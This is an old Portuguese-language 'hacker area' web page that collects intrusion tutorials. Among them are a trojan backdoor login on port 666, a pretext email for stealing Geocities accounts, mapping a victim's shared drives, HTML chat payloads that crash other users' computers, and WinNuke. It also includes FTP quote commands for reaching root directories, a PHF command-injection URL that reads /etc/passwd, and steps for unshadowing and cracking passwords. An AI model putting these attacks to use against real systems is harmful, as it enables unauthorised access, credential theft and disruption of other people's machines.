Psycho Page - Hackers' Area
Área Informativa (Hacker)
É uma
invasão fácil, mas você irá precisar do programa Aabout (www.dolphinsys.com).E a
vítima também.
Procedimento:
Primeiro você deve contactar a
vítima e fazê-la executar o programa Aabout, depois entre no telnet do windows
(C:\windows\telnet.exe). Vá ao menu Conectar e clique em Sistema Remoto. Vai aparecer uma
tela para o login. Como host, coloque o IP dinâmico da vítima e como porta, digite 666.
Clique em conectar. No login, digite a palavra gr! (é 'gr' com o ponto
de exclamação)
Agora aparece um PROMPT, no qual
você tem controle total sobre o PC da vítima. Use os comandos do DOS.
Original de Virtual Murder revisado por Blawnsteim
Introdução:
Qualquer Home-Page que
você visita pode muito bem obter informacões sobre você, como por exemplo: Provedor,
endereco IP, sistema operacional que está usando, Browser que esta usando e talvez o
e-mail.
O Anonymizer (www.anonymizer.com) age como intermediario entre o seu
programa de navegação e os outros websites. Assim sendo, ele impede que o site vizitado
tenha acesso a qualquer tipo de informacao sua.
Como usá-lo:
Para usar o servico, você deve
anteceder os URLs com o seguinte endereco do Anonymizer(http://www.anonymizer.com:8080).
Se voce quiser acessar a home-page da Microsoft, por exemplo, e não quiser que ela
obtenha seus dados, voce deve digitar no seu navegador http://www.anonymizer.com:8080/http://www.microsoft.com.
Pronto desta forma voce PoDeRá até mesmo usar aquelas senhas de sites
pornograficos que você tinha sem se preocupar tanto com a sua seguranca.
ATEÇÃO: O Anonymizer não é totalmente seguro. Por isso não pense
que usando o Anonymizer voce poderá sair por aí usando senhas falsas em tudo que é Site
e nunca saberão quem voce é!!!
Olha, é um jeito muito IDIOTA, mas
em todo caso, tente. O geocities tem um pequeno bug e através dele nós vamos fazer a
festa!!!
Uma vez, criei uma página no
Geocities (que deve estar abandonada até hoje). Quando eu recebi o e-mail delas indicando
que eu me associei e tudo mais, eles só me falaram o meu username e o endereço que eu
estava (ex: BAIRRO/NUMERO). Eles não me deram a senha. Por isso que eu acho o Geocities
uma bosta.
Vamos lá: Anote um endereço geobost..., ops..., geocities que você
quer "pegar" (ex: Pentagon/3333). Anote junto o username da pessoa que está com
o endereço. (ex: mike). Tente explorar os neighborhoods do geocities para achar. Tente
pegar uma página recente.
Agora entre no help do geocities e envie um e-mail anônimo (use o
e-mail da pessoa) para eles explicando que você não recebeu a senha e que o seu email
está com problemasl. Olha, se eles forem idiotas o bastante para cair nessa, comemore! Se
você não sabe inglês, use esse texto. Substitua as partes destacadas pelo devido texto.
Boa sorte!
Dear geocities,
Until now, I haven't recieved my
password and I can't work in my web site. Please re-send the passaword to me. I tried many
times to use the password lookup but I didn't get my password. Also my e-mail is having
some problems. Please re-send the password to seu e-mail. My name is username da
pessoa . My neigborhood is endereço Bairro/numero
Texto tirado do Virtual Murder Web Site
Introdução:
Várias são as fantasias e a
imaginação das pessoas sobre esta figura assustadora que navega no mundo virtual.
Então, vamos começar definindo primeiramente o que são estas figuras.
"Hacker":
É aquele que tem conhecimentos
profundos de sistemas operacionais e linguagens de programação, principalmente
"Unix" e "C" respectivamente. Conhece as falhas de segurança dos
sistemas e está sempre a procura de novas.
"Cracker":
O mesmo que "hacker", com
a diferença de utilizar seu conhecimento para o "mal". Destruir e roubar são
suas palavras de ordem.
"Phreaker":
Especializado em telefônia, atua na
obtenção de ligações telefônicas gratuitas, instalação de escutas, facilitando o
ataque a sistemas a partir de acesso no exterior, tornando-se invisíveis ao rastreamento
ou colocando a responsabilidade em terceiros. Devido ao grande número de pessoas que hoje
se dizem "hackers", novas definições poderão ser encontradas.
"Lammer":
É quem está tentando ser
"hacker", sai perguntando para todo mundo o que fazer para tornar-se um. Mas só
faz merda, não tem amigos na Net, e só sabe vacilar.
"Wannabe":
É o principiante que já aprendeu a
usar os programas prontos dos verdadeiros "hackers".
"Aracker":
O pior de todos, são os
"hackers de araque". Pensam que sabem tudo e acabam acessando revistas virtuais
pornográficas nas madrugadas.
"Guru":
O "supra-sumo" (mestre)
dos "hackers".
Violação de orelhões:
Para não ser descoberto, o
"hacker" estaciona o carro perto de orelhões, onde se conecta com um computador
portátil para iniciar seu "trabalho".
Ponte Eletrônica:
Computadores de instituições ou
universidades menos protegidas, que o "hacker" já tenha invadido, podem servir
de ponte para suas novas tentativas de invasão.
"Cavalo de Tróia" ou "Trojan Horses":
Semelhante ao famoso presente dos
troianos, onde dentro do belo cavalo de madeira, estavam escondidos centenas de soldados
prontos para atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos,
possuem dentro deles, códigos capazes de não só executar a função proposta, como
também, destruir, armazenar, ou copiar informações do sistema. Temos como exemplo,
programas que imitam "login" de um provedor e armazenam esta informação em
locais onde posteriormente o "curioso" poderá recupera-la facilmente.
"Backdoors":
São passagens secretas, ou
"porta dos fundos", isto é, senha secreta criada pelo autor do
"software", não documentada, é claro, que independente do administrador do
sistema pode ser usada para acessar ilimitadamente todos os recursos disponíveis.
"Farejamento de Redes":
Utilizando-se do empacotamento das mensagens nas redes de computadores, programas
especialistas procuram neles palavras como "password" e "senha".
Quando encontradas, o programa copia o pacote e o envia para o computador do
"hacker", que então se utiliza de técnicas próprias para tentar
decodifica-las, pois as senhas estão todas "criptografadas".
"Engenharia Social":
Observando-se usuários de
computadores digitarem suas senhas, procurando saber datas de nascimento e nome de seus
filhos, por exemplo, chega-se várias vezes a descobrir suas senhas, pois em geral, as
pessoas utilizam senhas que lembram algo de sua vida particular.
"Quebra Cabeça":
Através de programas capazes de
montar combinações de letras e números, os "hackers" tentam acessar os seus
alvos. Esta técnica é muito demorada, pois as tentativas deverão ser efetuadas por um
período curto e com grandes intervalos de tempo, para não despertar suspeita.
"Dedução":
Muitos usuário utilizam senhas
iguais ao do nome do "login" , ou seu próprio nome para "login" e
sobrenome para "password". Pior ainda, alguns administradores utilizam as senhas
padrões em seus sistemas, facilitando bastante a atuação dos "hackers".
"Invasão do Servidor":
Através de "ftp"
anônimo, pode-se baixar o arquivo que contem as "passwords" dos usuários e,
através de técnicas de tentativa de "descriptografias", obter
"passwords" deste provedor.
Hackeando IP
Introdução:
Uma conexão PPP é essencial para se
invadir por IP, além da conexão PPP é preciso o IP da pessoa que será invadida. Após
disso você terá o controle de todos os drives do PC da Vítima.
Observações:
É preciso que a Vítima tenha o
compartilhamento de arquivos instalado.
Configuração:
Veja se você tem o programa NBTSTAT.EXE
- No diretório do Windows.
É provavel que você o tenha, porque a instalação padrão do Windows
o instala.
Veja também se você está com driver Clientes para Redes
Microsoft instalado no icone Redes, do Painel de
Controle; se não estiver, instale-o. (Isso você deve saber, né!!!)
O próximo passo é configurar WINS
e LMHOSTS. O WINS serve para localizar computadores com
IP fixo. E o LMHOSTS, computadores com IP dinâmicos (IPs dinamicos são
aqueles que são atribuidos pelo Provedor, que são a maioria).
Vá ao Painel de Controle e abra o icone Redes.
Clique em TCP/IP, e em seguida no botão Propriedades.
Clique em Configuração WINS e depois ative a resolução WINS.
Invasão:
Pegue o IP da vítima na hora
que você for fazer a invasão pois o IP pode mudar sempre que ela se conectar.
Vamos usar o IP 200.222.30.12 como exemplo.
Digite no prompt do DOS: nbtstat
-A 200.222.30.12 (o -A deve ser em
maiúsculo).
Pode por acaso aparecer a mensagem "Host not found",
isso ocorre porque o PC da vítima pode não ter compartilhamento de dados instalado ou é
um IP inexistente.
Mas se aparecer um monte de nomes doidos com "<03>"
antes, aí, você deve pegar o nome do negócio que estiver com "<03>"
atrás do nome.
Rapidamente entre no arquivo LMHOSTS.SAM, do
diretório do Windows usando o Notepad, e adicione à ele (abaixo dos outros IPS):
[IP da vítima]
[NetBios]
NetBios na verdade é aquele
nome doido que aparece na mesma linha do IP da vítima.
Mas lembre-se de ser rápido porque nunca se sabe quando a vítima se
desconecta.
Mapeando os Drives:
Mapeie os drives da vítima
fazerem parte de seu PC!!!
No Windows Explorer, vá no item
Ferramentas e depois Mapear unidade de Rede. Escolha uma
letra de drive qualquer, e no endereço coloque: //200.222.30.12.
Depois no Menu Iniciar, vá em Executar
e digite: //200.222.30.12.
HTML em Chat
Para enviar imagens...
Comando: <img src="endereço do
arquivo">
O endereço do arquivo é o local onde ele está na
web, no caso você deve clicar com o botão direito do mouse na figura que você quer
mandar e pedir propriedades. Ex.: Uma figura do site
http://jacinto.pinto.aqui.no.rego.com/figura.jpg ai o comando ficaria
<img src="http://jacinto.pinto.aqui.no.rego.com/figura.jpg">
Para detonar o pc de alguém
Comando:
<img src="file:///a:/34646xx">
<img src="file:///a:/34646xy">
<img src="file:///a:/34646xz">
<img src="file:///d:/34646xx">
<img src="file:///d:/34646xx">
<img src="file:///e:/34646xx">
Obs: Tudo junto na mesma linha de mensagem
Como ferrar com a sala toda
Para ferrar a sala toda você deve usar o comando
<img src="qualquer foto" width="9999999999999999999999999999">
<img src="qualquer foto" width="9999999999999999999999999999">
<img src="qualquer foto" width="9999999999999999999999999999">
Obs: Tudo junto na mesma linha de mensagem
Para colocar um som na sala
<img
src="http://jacinto.pinto.aqui.no.rego.com/figura.jpg"
onload="window.open('http://jacinto.pinto.aqui.no.rego.com/som.wav')"> .
Se isso não funcionar tente isso <a href="endereço do arquivo">
Clique aqui pra olvir um som </a> - Isso faz quem clikar no link ouvir o som.
Para mexer com a letra
O tamanho pode ser alterado usando o comando < font
size="TAMANHO" >
O tamanho é de 1 até 7 , a cor da letra pode ser alterado usando o comando
<font color="COR"> CoR é o nome da cor em inglês exempo <font
color="red">
Nuke'em
Nuke ("NUCLEAR") é um ataque
feito para travar o computador de um usuário com conexão do tipo TCP/IP (win95/NT), para
isso é preciso saber apenas o IP ou o HOST deste usuário.
O nuke trabalha em cima da porta 139 ou 135 (win/NT) de sua conexão e
envia vários pacotes ICMP (mensagens de erro) fazendo com que o computador seja
desconectado do servidor.
Usando o WinNuke o usuário que for nukado poderá receber uma mensagem
de erro azul! O nuke não é prejudicial ao computador, mas enche muito!
Para praticar o NUKE basta fazer download de algum programa e saber um
endereço de IP e nukar!
Hackeando FTP
Existem varios Programas de FTP'S,
se não quizer saber de ftp porra nehuma use o do DOS!!! Vá ao Prompt e digite FTP, ao
aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt <to>, digite o nome
do host ou seu IP, tipo <to> ftp.mandic.com.br. Ao conectar ele pedirá a senha e o
Password, tente usar os passwords UNIX, se não der, vc deve entrar INVISIVEL. Veja
abaixo:
No login precione ENTER
No password precione ENTER
Irá aparecer novamente o prompt ftp> , ai é só
digitar:
quote user ftp <ENTER>
quote cwd ~root <ENTER>
quote pass ftp <ENTER>
Pronto, vc esta Hackeando...
Mas tem um porém..., se escrever a mensagem: user restriction aplly, vc não está
Hackeando.., pois está aplicada a proteção..., para isto tente com outro user tipo
quote cwd ~sys e os outros da lista UNIX....
ATENÇÃO!!!
Não tente Hackear usando o
"user normal" de FTP'S, que é login: anonymous e password: seu
E-Mail, pois vai ser aplicado a proteção....
MEU DEUS, EU ENTREI e AGORA o QUE FAÇO???
Ao entrar vc vai estar no Diretorio
do login, tipo \home\root\,
Dai, para ver a lista de users vc
volta um dir vá para o dir \home\
e cada dir é um usuario,... não tentem pegar as senhas , pois são Cryptografadas...
Pois a maioria dos users usa a mesma senha login....
Ok... se vc não sabe os comandos,
ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois
irá aparecer os comandos... e ai é só Hackear !!! Não fique mais que 5 Min em um
servidor, pois ele caçara seu IP, e seu login, e vai ser CADEIA !!!
Os ataques por monitoração são
baseados em software de monitoração de rede conhecido como "sniffer",
instalado surrepticiamente pelos invasores.
O sniffer grava os primeiros 128 bytes de cada sessão login, telnet e
FTP session vista naquele segmento de rede local, comprometendo TODO o tráfego de/para
qualquer máquina naquele segmento, bem como o tráfego que passar por aquele segmento. Os
dados capturados incluem o nome do host destino, o username e a password. A informação
é gravada num arquivo posteriormente recuperado pelo invasor para ter acesso a outras
máquinas.
Em muitos casos os invasores obtem acesso inicial aos sistemas usando
uma das seguintes técnicas:
- Obtém o arquivo de passwords via FTP em sistemas impropriamente
configurados.
- Obtém o arquivo de password de sistemas rodando versões inseguras do
NIS
- Obtém acesso ao sistema de arquivos locais via pontos exportados para
montagem com NFS, sem restrições. Usam um nome de login e password capturada por um
sniffer rodando em outro sistema.
Uma vez no sistema, os invasores
obtem privilegios de root explorando vulnerabilidades conhecidas, tal como rdist, Sun
Sparc integer division, e arquivos utmp passíveis de escrita por todo mundo ou usando uma
password de root capturada.
Eles então instalam o software sniffer, registrando a informação capturada num arquivo
invisível. Adicionalemente, eles instalam Cavalos de Troia em substituição e uma ou
mais dentre os seguintes arquivos do sistema, para ocultar sua presença:
/bin/login
/usr/etc/in.telnetd
/usr/kvm/ps
/usr/ucb/netstat
Permissão Forçada - ICQ
Se alguem já negou seu
System Request, não se preocupe, o texto abaixo dá um jeito pra isso:
1º. Crie um arquivo texto (.txt)
exatamente com o texto a seguir e salve com exensão *****.uin:
[ICQ User]
UIN=1234567654321 |
UIN#
da Vítima |
[email protected] |
E-mail
do cara* |
NickName=Dacuh |
Nickname
do cara* |
FirstName=Ze |
Primeiro
nome da Vítima* |
LastName=Da
rosca |
Último
nome da Vítima* |
*como está no cadastro da
Mirabilis.
2º. Após criar o
arquivo e salvar com a extensão .uin, dê um duplo clique no arquivo criado. Você
perceberá que o UIN# do cara foi adicionado a sua Lista de Contato após o duplo clique.
O ataque via browser é um dos ataques mais faceis de executar, mas
não dá nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metódo:
Primeiramente você tem
que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar
no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o
geralmente o arquivo "passwd" é o que contém os passwords encripitados (se
você nao sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários
servidores que só Root pode entrar no diretório "/etc", para outros usuarios
é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse
arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém
um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos
(inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista
de passwords, é muito simples, apenas digite essa URL no seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer
hackear.
Ex:
http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça vai ver que para que não de
nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá
uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca
tentei, mas pela lógica dá.
Se você está afim de pegar senhas
para o seu uso, leia atentamente as instruções abaixo:
1. O jeito mais facil de pegar
senhas, é fazendo o download do arquivo passwd, que fica no diretorio /etc do provedor. Neste arquivo, estão armazenado os logins,
senhas cryptografadas e outros dados de todos os 'users' daquele provedor. Na maioria dos
lugares o arquivo passwd contido no diretorio /etc, vem com um chamado shadow.
O que seria shadow?
Shadow, é quando o arquivo passwd nao vem com as senhas
cryptografadas. Ele vem com um * no lugar da senha. Abaixo
você tem um exemplo de um passwd com shadow.
kaneko:*:118:100:Take7:TaniKayoko:/home/students/makizono/s974076:/bin/csh
E com esse shadow, não da pra você
descryptografar as senhas. Mais existe um jeito de tirar esse shadow! Basta voce usar o
programa "unshad.c". Se o arquivo passwd estiver sem shadow, não será
necessário a utilizacao desse programa.
Abaixo, um exemplo de um passwd sem
shadow.
galvao:r2ln6GlgXEIVg:2201:2001:Geraldo P.
Galvao:/home/galvao:/bin/csh
No exemplo mostrado, a senha
cryptografada é "r2ln6GlgXEIVg"
2.Descryptografando as senhas
Bom, já falamos da parte de
download do passwd agora, vamos falar de como se descryptografa as senhas. Para
descryptografar as senhas, você precisara de um cracker (Programa usado para
descryptografar senhas)
Ex.: CrackJack
3.Como usar o programa unshad.c
Usar o programa unshad.c, é muito
fácil. Basta você fazer um upload dele pra sua shell, e quando ele ja estiver na shell,
digite "cc -o unshad unshad.c" para compila-lo. Após a compilacao, basta
digitar "./unshad" e as shells se abriram sem o shadow.
Se você usa o Windows 95 como
sistema operacional, jogue ele fora e pegue o LINUX. Se você não usar o LINUX não será
um verdadeiro Hacker.
Como fazer um arquivo para encher o HD
Crie um diretorio temporario, exemplo: C:\LIXO.
Edite um arquivo do tipo X.BAT, atraves do EDIT do DOS e monte o
seguinte programa conforme as linhas abaixo.
@ECHO OFF
DIR >> ENCHE
:ENCHE
TYPE ENCHE >> ENCHE
CLS
ECHO ENCHENDO AGUARDE...
GOTO ENCHE
Pronto, o programinha esta feito,
ela ira criar cada vez um arquivo
maior com o nome enche no C:\LIXO.
E para que usar um programinha inutil destes? Simplesmente para testar
o disco rigido, o CPU nao pode travar com o HD enchendo, nem quando ele
ficar cheio, se o CPU travar eh porque o HD esta com problema, se ele
aguentar ateh nao ter mais espaco o HD nao tem problema.
Para cancelar a operacao, pressione CTRL+C ...
Atencao, voce pode formatar um HD e fazer este teste, e ver se o HD
esta OK, o HD pode estar todo deletado, ou pode ser um HD usado, com
100Mb livre um de 1.2Gb ou um com 70 ou 60Mb de 1.0Gb, etc... e rodar o
programa, para testar neste HD, e quando o HD encher voce ve se esta OK
ou nao. Quando der problema, o problema pode ser do CPU ou MB as vezes.
Depois que rodar o programa eh soh deletar o diretorio LIXO e ele
desenche o HD!
Nunca rode isto no PROMPT do DOS do WIN 3.1 ou principalmente no
WIN 95, que o CPU ira travar. Se este for seu caso, entre antes em MODO
Somente prompt ou MODO MS-DOS.
Sabe aqueles sharewares que deixam o
usuario usar o programa completo por um mes e depois se auto-desinstalam do sistema?? Eles
tem uma falha bem visivel que muitas pessoas jah devem ter percebido. Eles armazenam a
data de instalacao em um arquivo ou setor do disco e quando completam 30 dias depois da
data de instalacao, impossibilitam a sua execuçao a menos que se
registre-o. Para que esses 30 dias nao chegem tao rapido, basta modificar a data do seu
computador. Para traz e' claro.
DICA: As datas de 11 em 11 anos se repetem, ou seja..
26/9/1998 - sabado.
11 anos antes: 26/9/1987 - sabado.
+11 anos atraz: 26/9/1976 - sabado.
Ai então os dias da semana bateram
com os dias do mes, e você não se atrapalhará todo, só ficara 11 anos atrasado.
Antes de mais nada é importante
salientar que nos EUA existe leis contra Crime Virtual, mas no Brasil ainda não. Existe
uma lei transitando no congresso a esse respeito, mas enquanto não é aprovada, não
existe acusação de Crime Virtual. Mas não quer dizer que você pode invadir uma
Home Page. Porque mesmo não tendo uma acusação de Crime Virtual, você pode ser
processado por perdas e danos, por exemplo. Pense muito bem antes de fazer qualquer
besteira.
Bom, agora que você já leu o aviso,
vamos ao que interessa. Antes de mais nada: você já usou o IRC? Não é essencial, mas
se já usou a BrasNET já deve ter percebido que quando você entra num canal registrado
vazio, e o ChanServ está com lag, demora para identificar o canal como registrado. Nesse
meio tempo você fica como OP, até o ChanServ identificar o canal. Tem gente que até
rouba canais assim. Para invadir uma HP você parte do mesmo princípio. Você dá um ping
grande no domínio em que quer entrar. Caso o ping for suficientemente grande o server
cai.
Quando ele estiver voltando você
entra. Quando todos os sitemas estiverem recuperados você pode ser derrubado do domínio
(espero que sem fazer nada de errado). E nem adianta que da sua casa você não pode dar
um ping suficientemente grande num domínio para derrubá-lo. Também não vou dizer como
você pode fazer para derrubar o domínio. Como disse desde o início, é só para você
saber como fazer, não é para pôr isso em prática.
Texto traduzido por Mino e retirado da DeltaSitez .